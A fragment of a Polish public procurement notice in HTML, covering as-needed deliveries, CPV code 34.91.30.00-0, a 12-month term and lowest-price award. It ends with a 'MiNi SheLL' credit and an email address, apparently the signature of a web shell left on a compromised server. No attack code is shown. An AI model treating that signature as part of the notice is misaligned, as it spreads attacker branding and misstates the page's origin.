Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com